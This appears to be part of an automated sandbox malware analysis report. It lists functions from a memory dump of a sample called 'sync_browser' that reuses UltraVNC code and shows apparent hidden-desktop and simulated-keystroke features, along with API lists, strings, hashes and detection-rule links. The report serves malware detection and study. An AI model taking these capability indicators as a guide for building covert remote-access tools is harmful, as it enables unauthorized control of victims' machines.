Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
API String ID: 2777246624-1049114938
Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
Instruction ID: 357801257e6a2b592504b5711aa8267bdc8d1aaccdb27784d35e8fa54273472d
Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
Instruction Fuzzy Hash: DD213E31A08692C7E714AF51E40066DBBA0FB85B48FC44136DE8E57A58DF3CE546C720

Function 00007FF7D59802A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyA.USER32 ref: 00007FF7D59802C5
MapVirtualKeyA.USER32 ref: 00007FF7D59802F1

Strings

fake %d down, xrefs: 00007FF7D5980305
fake %d up, xrefs: 00007FF7D59802D8

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Virtual
String ID: fake %d down$fake %d up
API String ID: 4278518827-2496597273
Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
Instruction ID: 63dfda61b59167dc2ad6a3923849d62bff66f7d49c2cf81cb04ec008178e276d
Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
Instruction Fuzzy Hash: 9A018E21F1869187FB14A726A45057DAF92AF88F48FD88437E94E032A5CF3CD846C760

Function 00007FF7D593A550 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593A440: RegOpenKeyExA.ADVAPI32 ref: 00007FF7D593A465
Part of subcall function 00007FF7D593A440: RegQueryValueExA.ADVAPI32 ref: 00007FF7D593A49F
Part of subcall function 00007FF7D593A440: RegCloseKey.ADVAPI32 ref: 00007FF7D593A4AA

SystemParametersInfoA.USER32 ref: 00007FF7D593A594
SystemParametersInfoA.USER32 ref: 00007FF7D593A5AC

Part of subcall function 00007FF7D593A390: LoadLibraryA.KERNEL32 ref: 00007FF7D593A3A6
Part of subcall function 00007FF7D593A390: LoadLibraryA.KERNEL32 ref: 00007FF7D593A3CB
Part of subcall function 00007FF7D593A390: GetProcAddress.KERNEL32 ref: 00007FF7D593A3E3
Part of subcall function 00007FF7D593A390: FreeLibrary.KERNEL32 ref: 00007FF7D593A407

Strings

HideDesktop.cpp : Killwallpaper %i %i, xrefs: 00007FF7D593A5C1
HideDesktop.cpp : Killwallpaper %i, xrefs: 00007FF7D593A55B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
API String ID: 542764273-2415377678
Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
Instruction ID: f1937934f01ef9b0e05d7b53b515e6a014d31272b39293c6f009430bb9340452
Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
Instruction Fuzzy Hash: 3A01E575A1816397F604BB64E800AADAF61AF94B49FC04037DC0E57565DE3CA20AC7B2

Function 00007FF7D599A220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

FindWindowExA.USER32 ref: 00007FF7D599A23F
GetWindowThreadProcessId.USER32 ref: 00007FF7D599A259
GetCurrentProcessId.KERNEL32 ref: 00007FF7D599A25F

Strings

WinVNC Tray Icon, xrefs: 00007FF7D599A230

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessWindow$CurrentFindThread
String ID: WinVNC Tray Icon
API String ID: 1332243453-1071638575
Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
Instruction ID: bbb38e034ca1ca3dc31c9afdef08fc38ec53efc64fc003b61b0e0050f9265b0e
Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
Instruction Fuzzy Hash: 4EF01221A2864187DA946B65B44146DE654EFC8FC4BC42036EE5E46758DF3CD4858B10

Function 00007FF7D59522C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF7D5952328

Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8

free.LIBCMT ref: 00007FF7D5952564
free.LIBCMT ref: 00007FF7D5952617

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7D595230B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
API String ID: 1063416079-2438250478
Opcode ID: c273d361c54b140607c5df8769fb8004b8d8c010dfb8c9ff937b48554944af27
Instruction ID: be4180cfebb41bdb263548e52a7d9379640d4c637f68427d5fbfbd19574b65da
Opcode Fuzzy Hash: c273d361c54b140607c5df8769fb8004b8d8c010dfb8c9ff937b48554944af27
Instruction Fuzzy Hash: BDA17D26B04A9186EB50EB66C4542ADA761FB84FACF944332DE2E577E5DF38C446C320

Function 00007FF7D595A580 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D595A75F
LeaveCriticalSection.KERNEL32 ref: 00007FF7D595A78F

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF7D595A5D6
i, xrefs: 00007FF7D595A754

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
API String ID: 3168844106-2727237473
Opcode ID: 7ea70ecdf00bad4228af3a672ca1c2fbbeb6b4775179ba25f3cb68a3c055f025
Instruction ID: 6accac32b2603e37560c870a288234d6f93c9db9d0e236e060ebdec38b134999
Opcode Fuzzy Hash: 7ea70ecdf00bad4228af3a672ca1c2fbbeb6b4775179ba25f3cb68a3c055f025
Instruction Fuzzy Hash: CA61E022A0C7C29AE724AB2594447BEA7A1FB46B98FC40136DE9D477C1CF3CE495C714

Function 00007FF7D59F8704 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF7D59F8718

Part of subcall function 00007FF7D59F77D0: _amsg_exit.LIBCMT ref: 00007FF7D59F77FA

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF7D59F87D0
free.LIBCMT ref: 00007FF7D59F87E5
EnterCriticalSection.KERNEL32 ref: 00007FF7D59F8807

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
String ID:
API String ID: 3786353176-0
Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
Instruction ID: 6c5220db02c706c80584a9f02b2311ecccec967357d27101b9dde8a5aef2aa57
Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
Instruction Fuzzy Hash: 29415C66A18A4283EB54AB15E49473CBA61FF94F98FD54537CE5D072A1CF3CE400C360

Function 00007FF7D593C590 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF7D593C5D4

Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8

Strings

VUUU, xrefs: 00007FF7D593C658
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00007FF7D593C5F8
VUUU, xrefs: 00007FF7D593C5B3

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeap_callnewhmalloc
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
API String ID: 908589684-1814909704
Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
Instruction ID: b68fe90a252d0f8812317a0be27d1d6f918b8557c2c90827309bb1d278aa73e3
Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
Instruction Fuzzy Hash: 37218A32B09B9687E3509B69A84062CBB95EB54B94F891237EFAC47BC5DE39D403C710

Function 00007FF7D5947650 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59E7978: malloc.LIBCMT ref: 00007FF7D59E7992

Sleep.KERNEL32 ref: 00007FF7D5947720

Part of subcall function 00007FF7D5947A30: SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A4B
Part of subcall function 00007FF7D5947A30: SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A55
Part of subcall function 00007FF7D5947A30: SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A5F
Part of subcall function 00007FF7D5947A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A8B
Part of subcall function 00007FF7D5947A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A95

Strings

keyEvent, xrefs: 00007FF7D59476BE
start_event, xrefs: 00007FF7D5947703
stop_event, xrefs: 00007FF7D59476E0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Event$CriticalInitializeSection$Sleepmalloc
String ID: keyEvent$start_event$stop_event
API String ID: 367317321-1979648887
Opcode ID: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
Instruction ID: 02da7ab382d4995683f07bd3a39af6c14965743d4bdd8ac8c866da024714ceac
Opcode Fuzzy Hash: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
Instruction Fuzzy Hash: 5A316A65E19A5742FB58BB18A450B7DAB919FC5F48FC4003AED0E0B792DF3CE84583A4

Function 00007FF7D59E99CC Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59E9923
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E992E
_errno.LIBCMT ref: 00007FF7D59E9960
_errno.LIBCMT ref: 00007FF7D59E9972

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
Instruction ID: 8a9d7f1db181d379fdec0a194345b6815bc86aadc61d4de0b77329a13759c7d3
Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
Instruction Fuzzy Hash: BB215E61A1E68346FB61AB31680127DE295AF45FC8FC45433EE8D87B96EF3CE5408724

Function 00007FF7D5965940 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59E7978: malloc.LIBCMT ref: 00007FF7D59E7992

InitializeCriticalSection.KERNEL32 ref: 00007FF7D5965995

Part of subcall function 00007FF7D59F2950: RaiseException.KERNEL32 ref: 00007FF7D59F29CB

EnterCriticalSection.KERNEL32 ref: 00007FF7D59659DF
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5965A0B

Strings

G, xrefs: 00007FF7D59659D4

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
String ID: G
API String ID: 2834860089-985283518
Opcode ID: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
Instruction ID: f7ce2601a126d6baedcc136ce265e61cda1c57de7ffaf4cea005157588114bca
Opcode Fuzzy Hash: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
Instruction Fuzzy Hash: D6317E3251878587E710AF24E4402ACB7A4FF84FA8FC40236EA9907A98CF78D495CB21

Function 00007FF7D593A290 Relevance: 6.1, APIs: 4, Instructions: 57comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF7D593A2B8
CoCreateInstance.OLE32 ref: 00007FF7D593A2E5
CoUninitialize.OLE32 ref: 00007FF7D593A320

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
Instruction ID: 9878c59c439b71ad071fc4005190f70609b22a5f774636bff4509a5ce76bf673
Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
